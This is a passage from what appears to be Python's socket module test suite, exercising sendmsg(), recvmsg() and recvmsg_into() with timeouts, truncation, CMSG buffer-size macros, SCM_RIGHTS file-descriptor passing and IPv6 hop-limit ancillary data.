# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
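# Subclasses receive through self.doRecvmsg(); RecvmsgIntoMixin is
# expected to override it to call recvmsg_into() and return the same
# (msg, ancdata, flags, addr) shape, so one set of tests exercises both
# APIs.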
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
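# For reference: CMSG_LEN(n) is the length of a cmsghdr header plus n
# bytes of data with no trailing padding, so CMSG_LEN(n) - CMSG_LEN(0)
# == n, while CMSG_SPACE(n) also includes the padding needed to align a
# following header, so CMSG_SPACE(n) >= CMSG_LEN(n).  The tests below
# check exactly these relationships.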
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
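# socklen_t_limit is the largest value that fits in a socklen_t (at most
# an int wide); CMSG_LEN()/CMSG_SPACE() results must not exceed it, and
# arguments whose result would exceed it are expected to raise
# OverflowError.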
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
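# SCM_RIGHTS ancillary data carries an array of file descriptors; the
# kernel installs duplicates of them in the receiving process, so the
# descriptor numbers received may differ from the ones sent even when
# sender and receiver live in the same process, as they do here.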
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
